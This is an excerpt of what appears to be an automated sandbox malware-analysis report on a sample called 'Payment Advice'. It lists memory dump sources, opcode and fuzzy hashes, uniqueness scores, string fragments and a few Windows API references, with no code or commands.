                                                                                      • Instruction Fuzzy Hash: 4E81FFB4E14219DFDB44CFA9C5849AEFBF2FF89251F14956AE415AB320D330AA02CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c121bb580dcae3f61a4076bd27a14c77d7f5ecc3d57b25b5bf396f8571ea24a7
                                                                                      • Instruction ID: 868f2382bf26b3a51ee79ebed9949ce51eec0ce217ab7e7a756d02405e1eb960
                                                                                      • Opcode Fuzzy Hash: c121bb580dcae3f61a4076bd27a14c77d7f5ecc3d57b25b5bf396f8571ea24a7
                                                                                      • Instruction Fuzzy Hash: C2810F74E1421ADFDB44CFA9C58499EBBF2FF89251F14956AE415AB320D330AA02CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d13666fe32b88432d69f52e507fa6c9744681c2bc320824d237244abb30735d5
                                                                                      • Instruction ID: 01c5961f4d75f5ecb2d114d5f69244fdc0deb37681f831d6d1dcbefac9ba332a
                                                                                      • Opcode Fuzzy Hash: d13666fe32b88432d69f52e507fa6c9744681c2bc320824d237244abb30735d5
                                                                                      • Instruction Fuzzy Hash: 6551B092A5F3E06EEB076B3C59710D63F708D5325670B42DBC4C0CA0BBE599894CC7AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe84e49dab391237f40904bb554802efaccfc32b35b86abed1815d219cbada4f
                                                                                      • Instruction ID: 8e63c7d34919f01c636e009a698fdb65f6effdcb02ad85cb09800ed8298cb92c
                                                                                      • Opcode Fuzzy Hash: fe84e49dab391237f40904bb554802efaccfc32b35b86abed1815d219cbada4f
                                                                                      • Instruction Fuzzy Hash: 40711774E0520ADFCB04DF9AD4859EEFBB6FB88310F10892AE415AB354D7349A41CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:13.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:32
                                                                                      Total number of Limit Nodes:6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: dM$dM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-292641143
                                                                                      • Opcode ID: 58c421d7c012f384bdeca365bfbc9cc42109fe5f5f39509bbc959303cbfdce73
                                                                                      • Instruction ID: c9b59de4ae8033651c9256b859b0049a8eecf4fb55fd67674d7b1b386c3a78ed
                                                                                      • Opcode Fuzzy Hash: 58c421d7c012f384bdeca365bfbc9cc42109fe5f5f39509bbc959303cbfdce73
                                                                                      • Instruction Fuzzy Hash: FFE15C34E1020A8FCF69DFA8D5806AEB7B2EF8A714F10852AD505EB354DB75DC46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 1e67609d0dcef6a4ca347d672d412d7c666f386eb7e8a162a4d556d891eb6b80
                                                                                      • Instruction ID: 2d0ee65f2e2b4166a0dce6dbf4615750dd5528172db0d31d82ac96a4aed405d7
                                                                                      • Opcode Fuzzy Hash: 1e67609d0dcef6a4ca347d672d412d7c666f386eb7e8a162a4d556d891eb6b80
                                                                                      • Instruction Fuzzy Hash: A8914B34F1020A9FDF64DF65D850BAEB3F6AF89244F108569C909EB384EB70DD468B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: b071f363af85cfdbabb31c544c025ef4ccc27f61fab68b5e3b8ddd2bac92de4f
                                                                                      • Instruction ID: d520367715ccc2082af787e2e386af2e6834b6fb85b778c4fbec8785204da33f
                                                                                      • Opcode Fuzzy Hash: b071f363af85cfdbabb31c544c025ef4ccc27f61fab68b5e3b8ddd2bac92de4f
                                                                                      • Instruction Fuzzy Hash: DA622E30A002058FCB55EB68D590A5EB7F2FF85304F248A29D419DF369DB75ED8ACB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: 60f619d27c9d60a45d6daba5f6af0ce44a8a3d038a7b11930b900fd4500c8ee9
                                                                                      • Instruction ID: 5421abbd0ea86355704e679f5d90e8b2cec094153adfda5a33299f0ae70c6748
                                                                                      • Opcode Fuzzy Hash: 60f619d27c9d60a45d6daba5f6af0ce44a8a3d038a7b11930b900fd4500c8ee9
                                                                                      • Instruction Fuzzy Hash: 47617E34F002089FEB549FB5C8557AEBBF6EB89300F20852AE109EB395DF758D458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 1f449db4ce9254369afffac33e6b07653e3f969d89f306bdf438c3c641025da3
                                                                                      • Instruction ID: daba9aa73fe6412fb088a7bbc289d5f3e895b659f7a123c30c1d124d5029d703
                                                                                      • Opcode Fuzzy Hash: 1f449db4ce9254369afffac33e6b07653e3f969d89f306bdf438c3c641025da3
                                                                                      • Instruction Fuzzy Hash: 46513D35F11205AFDF54DB74D950BAEB3FAABC9644F108469C509EB384EB70DC428B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (bq$(bq
                                                                                      • API String ID: 0-4224401849
                                                                                      • Opcode ID: 4831c1649cc597c2398cde07f0b56571ef14885a384777faa473047c7f8f6288
                                                                                      • Instruction ID: 1a60bd31f808b8d3d62f53a86f981e48bd8e7bcd31615e515117a7bb4cd96215
                                                                                      • Opcode Fuzzy Hash: 4831c1649cc597c2398cde07f0b56571ef14885a384777faa473047c7f8f6288
                                                                                      • Instruction Fuzzy Hash: 4E518F30E047088FCB55EF79C85469EBBF2EF89300F148669D44AAB351EF70A981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 933ebd73643e1d47700c44df7ebf956ef08d0811f9b37beb9e03846722221199
                                                                                      • Instruction ID: 94e24e62e3e46f89abf6253571fe613829611df461ac910e982fa0b0a67fee06
                                                                                      • Opcode Fuzzy Hash: 933ebd73643e1d47700c44df7ebf956ef08d0811f9b37beb9e03846722221199
                                                                                      • Instruction Fuzzy Hash: 97518E74F002089FEB559FB5C8557AEBBE7EB88700F20852AE109EB395DE758C018B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F881E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 671dfdabd105f8207c2f9a66411f3f883ebea0453c06331714b4bcf3a2bf4bcb
                                                                                      • Instruction ID: a211a289f4aa02e73c5b8a7e9df05a59a321e178dd39802d8192a223168be05e
                                                                                      • Opcode Fuzzy Hash: 671dfdabd105f8207c2f9a66411f3f883ebea0453c06331714b4bcf3a2bf4bcb
                                                                                      • Instruction Fuzzy Hash: 732158B1C0065A9BCB10DFAAD4447DEFBB4FF48320F10816AD858A7251D734A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F881E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 2263cabad00f35f96b4c94d17eaab29a7bbb406431413a5bf861386553ed6316
                                                                                      • Instruction ID: 009109a903c8a28df2dd7e0773a14d2dd2492f7f5247a05dc0f973a2f1860dda
                                                                                      • Opcode Fuzzy Hash: 2263cabad00f35f96b4c94d17eaab29a7bbb406431413a5bf861386553ed6316
                                                                                      • Instruction Fuzzy Hash: FA1133B1C0061A9BCB10DF9AD844BDEFBB4BB48320F10812AD858A7240DB38A941CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F8F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8da3575be8cbb67f8ca8432e51aacc722cf961f0fb556bb578672982a789994e
                                                                                      • Instruction ID: 2c12e6a7009ebbad0df912b2deeac3e1e3765e58b610cf55194a875743351261
                                                                                      • Opcode Fuzzy Hash: 8da3575be8cbb67f8ca8432e51aacc722cf961f0fb556bb578672982a789994e
                                                                                      • Instruction Fuzzy Hash: 3051E630F102149FEFA4666CD99476F265ED7CA350F20482AE70ADB3E9CA7DCC459392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30b8f288898702d2d0df8f8fe922ee3bd5b2314b804e09e1d854965264bb4c06
                                                                                      • Instruction ID: 63cbde491c79bdde1f9d519790afc649f9951e5a3889f7a613f9378b78b29e1d
                                                                                      • Opcode Fuzzy Hash: 30b8f288898702d2d0df8f8fe922ee3bd5b2314b804e09e1d854965264bb4c06
                                                                                      • Instruction Fuzzy Hash: 58415D71E006098FDF70CFA9D880AAFFBB2FB85314F10492AE216D7650D731E9558B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f2aabd08d5199623bf1c94b6bfec3af6b164db52ff446f96c482048541a044a
                                                                                      • Instruction ID: ed25411c2f27d18141eaa3e4ff8165995df874fe15beed2f471cb80c8beea0ca
                                                                                      • Opcode Fuzzy Hash: 1f2aabd08d5199623bf1c94b6bfec3af6b164db52ff446f96c482048541a044a
                                                                                      • Instruction Fuzzy Hash: 40216B71508248DFEB01DF14DDC4B3ABFA6FB84314F20C569DA095B261C376D806C6A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df3a5a585cc6d31b15fcf84fbe37dcb8ee9923869a47df707064c52a7ff44b80
                                                                                      • Instruction ID: 5ec9831f9983071079f7c6f85e6198731b6cdffeb2e7876c931bf3744730315a
                                                                                      • Opcode Fuzzy Hash: df3a5a585cc6d31b15fcf84fbe37dcb8ee9923869a47df707064c52a7ff44b80
                                                                                      • Instruction Fuzzy Hash: 95212671608208DFCB05DF14DDC4B36BFA6FB94318F20C56DDA195B296C376E846CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6957e19c4be9f3fc22432f982fb63bb7ce62c7f0531d0e4e892587054be0bcaa
                                                                                      • Instruction ID: 393aabadcdb446cd0a6ba5772f5dd846ab37ffaf0deddd82bba5f17029607f99
                                                                                      • Opcode Fuzzy Hash: 6957e19c4be9f3fc22432f982fb63bb7ce62c7f0531d0e4e892587054be0bcaa
                                                                                      • Instruction Fuzzy Hash: 6821F571508208DFCB14DF14CDC4B26BF67FB84318F20C569EA495B251CB36D846CA61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f611f550dbfcbcc2e3e04789c2f85386ada082d9d3f4fa9b87347e5df8c18ec
                                                                                      • Instruction ID: e162c8e93c2129b108acd1290a34003fa62ea8cb5640bb8a8a3c7e3c9e9d9a3c
                                                                                      • Opcode Fuzzy Hash: 6f611f550dbfcbcc2e3e04789c2f85386ada082d9d3f4fa9b87347e5df8c18ec
                                                                                      • Instruction Fuzzy Hash: 962101B1648248DFDB05DF14CDC0B36BFA6FB94318F20C66DDA095B262C33AD846C661
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 993c8c6ba1d944dc291587509b83242723726e853fdebf7f67ca8c54b0252d25
                                                                                      • Instruction ID: edb18c9bd7bc205c8c2d046709835a55df2df3d76b7286ae6d978f20617c4d19
                                                                                      • Opcode Fuzzy Hash: 993c8c6ba1d944dc291587509b83242723726e853fdebf7f67ca8c54b0252d25
                                                                                      • Instruction Fuzzy Hash: 5631F1B0C40218DFDB60DF99C988BCEBFF5AB48314F20801AE445BB250C7B5A885CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c5685df7e82090dfcaaba1111872e06de6ff634b9a76158a7dd94f0ee562b77
                                                                                      • Instruction ID: 4acf707603dc8d1416a9afcd58c63361b2acfc4b824b6eec6334a4994c620c48
                                                                                      • Opcode Fuzzy Hash: 5c5685df7e82090dfcaaba1111872e06de6ff634b9a76158a7dd94f0ee562b77
                                                                                      • Instruction Fuzzy Hash: 05112B30B603209FEFA46A7CC85076F258EDB87754F20083AE34AEB395C96ACC4143D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4699a90ef8ca1f24a0700a45fe21e91d6780f20d552a1ae0e434dcb5aa58a23c
                                                                                      • Instruction ID: 4aac89924263ba74376cdf32fe16d3d2b52d92b6b568e3b7ea1a022945ed7a07
                                                                                      • Opcode Fuzzy Hash: 4699a90ef8ca1f24a0700a45fe21e91d6780f20d552a1ae0e434dcb5aa58a23c
                                                                                      • Instruction Fuzzy Hash: AE31EEB0C40218DFDB60CF99C988B8EBFF5AB48314F24801AE445BB250CBB59885CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
